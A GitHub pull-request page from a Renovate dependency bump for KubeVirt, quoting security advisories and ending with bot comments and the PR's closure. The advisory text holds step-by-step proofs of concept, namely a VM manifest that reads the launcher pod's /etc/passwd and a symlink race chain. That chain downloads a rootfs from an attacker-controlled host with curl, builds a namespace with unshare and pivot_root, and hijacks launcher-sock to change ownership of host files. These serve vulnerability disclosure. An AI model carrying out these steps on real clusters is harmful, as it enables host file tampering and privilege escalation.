        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode:

From the documentation of the different volume modes, one can infer that if the backing disk.img is not owned by the unprivileged user with UID 107, the VM should fail to mount it. In addition, it's expected that this backing file is in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of virt-launcher is not the expected behaviour. Below is demonstrated that after applying the VM manifest, the guest can read the /etc/passwd and default_migration.xml files from the virt-launcher pod's file system:

##### Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created

##### Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True

##### Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read
##### Within the `arbitrary-container-read` VM, inspect the available block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk

##### Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash

##### Inspect the mounted `default_migration.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>
operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m

##### Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

##### Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod 
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd
Impact

What kind of vulnerability is it? Who is impacted?

This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

  1. A symbolic link (launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
  2. Another symbolic link (disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.
  3. As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The below is inspired by an article, where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.

##### Download an container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar

##### Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine

##### Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh

##### Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
##### The user is root in its new USER namesapce
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root

##### Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin

##### Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"

##### Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img

##### Create the socket wich will confuse the isolator detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
  // ...
  //!!! MK: the change should happen here before executing the below line !!!
  isolationRes, err := c.podIsolationDetector.Detect(vmi)
		if err != nil {
			return fmt.Errorf(failedDetectIsolationFmt, err)
		}
		virtLauncherRootMount, err := isolationRes.MountRoot()
		if err != nil {
			return err
		}
		// ...

		// initialize disks images for empty PVC
		hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
		// MK: here the permissions are changed
		err = hostDiskCreator.Create(vmi)
		if err != nil {
			return fmt.Errorf("preparing host-disks failed: %v", err)
		}
    // ...

The manifest of the #acr("vmi") which is going to trigger the bug is:

##### The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:

##### the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-launcher connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host's /etc/passwd file:

##### `virt-launcher` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0
a

@redhat-renovate-bot redhat-renovate-bot added the release-note-none Denotes a PR that doesn't merit a release note. label Dec 4, 2025
@redhat-renovate-bot
Copy link
Collaborator Author

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: downloading github.com/onsi/ginkgo/v2 v2.22.1
go: downloading github.com/onsi/gomega v1.36.2
go: downloading golang.org/x/net v0.38.0
go: downloading golang.org/x/sync v0.12.0
go: downloading golang.org/x/text v0.23.0
go: downloading golang.org/x/term v0.30.0
go: downloading golang.org/x/oauth2 v0.27.0
go: downloading golang.org/x/time v0.9.0
go: downloading google.golang.org/protobuf v1.36.5
go: downloading golang.org/x/sys v0.31.0
go: downloading github.com/google/cel-go v0.23.2
go: downloading golang.org/x/crypto v0.36.0
go: downloading cel.dev/expr v0.19.1
go: downloading google.golang.org/genproto/googleapis/api v0.0.0-20241209162323-e6fa225c2576
go: downloading google.golang.org/grpc v1.68.1
go: downloading google.golang.org/genproto/googleapis/rpc v0.0.0-20241209162323-e6fa225c2576
go: downloading golang.org/x/tools v0.28.0
go: downloading github.com/google/pprof v0.0.0-20241210010833-40e02aabc2ad
go: downloading github.com/grpc-ecosystem/grpc-gateway/v2 v2.24.0
go: downloading k8s.io/api v0.34.2
go: github.com/kubevirt/kubevirt-tekton-tasks/cmd/disk-uploader imports
	k8s.io/client-go/kubernetes imports
	k8s.io/client-go/kubernetes/typed/coordination/v1alpha1 imports
	k8s.io/api/coordination/v1alpha1: cannot find module providing package k8s.io/api/coordination/v1alpha1
go: github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate tested by
	github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate.test imports
	kubevirt.io/client-go/kubevirt/fake imports
	kubevirt.io/api/instancetype/v1alpha1: cannot find module providing package kubevirt.io/api/instancetype/v1alpha1
go: github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate tested by
	github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate.test imports
	kubevirt.io/client-go/kubevirt/fake imports
	kubevirt.io/api/instancetype/v1alpha2: cannot find module providing package kubevirt.io/api/instancetype/v1alpha2

@kubevirt-bot kubevirt-bot added the dco-signoff: yes Indicates the PR's author has DCO signed all their commits. label Dec 4, 2025
@kubevirt-bot
Copy link
Contributor

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@openshift-ci openshift-ci bot requested a review from geetikakay December 4, 2025 15:27
@openshift-ci
Copy link

openshift-ci bot commented Dec 4, 2025

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@openshift-ci
Copy link

openshift-ci bot commented Dec 4, 2025

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name Commit Details Required Rerun command
ci/prow/images 86acc10 link true /test images
ci/prow/e2e-tests 86acc10 link true /test e2e-tests

Full PR test history. Your PR dashboard.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

@ksimon1
Copy link
Member

ksimon1 commented Dec 5, 2025

/close
we can't merge this, because it requires newer Golang, than we can use.

@kubevirt-bot
Copy link
Contributor

@ksimon1: Closed this PR.

In response to this:

/close
we can't merge this, because it requires newer Golang, than we can use.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.

@redhat-renovate-bot
Copy link
Collaborator Author

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (v1.7.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.

@redhat-renovate-bot redhat-renovate-bot deleted the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch December 6, 2025 07:18
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dco-signoff: yes Indicates the PR's author has DCO signed all their commits. release-note-none Denotes a PR that doesn't merit a release note. size/XS

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants